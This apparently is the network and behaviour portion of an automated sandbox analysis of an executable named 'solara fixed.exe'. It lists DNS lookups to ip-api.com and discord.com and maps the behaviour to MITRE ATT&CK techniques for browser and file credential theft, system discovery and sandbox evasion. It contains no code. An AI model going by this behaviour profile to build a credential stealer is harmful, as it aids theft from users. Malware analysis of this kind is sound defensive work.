g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

73.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

73.31.126.40.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

148 B
128 B
2
1

DNS Request

172.210.232.199.in-addr.arpa

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

solara fixed.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

solara fixed.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.138.232

162.159.128.233

162.159.137.232

162.159.135.232
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

232.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.136.159.162.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

66.209.201.84.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

66.209.201.84.in-addr.arpa
8.8.8.8:53

134.190.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

134.190.18.2.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion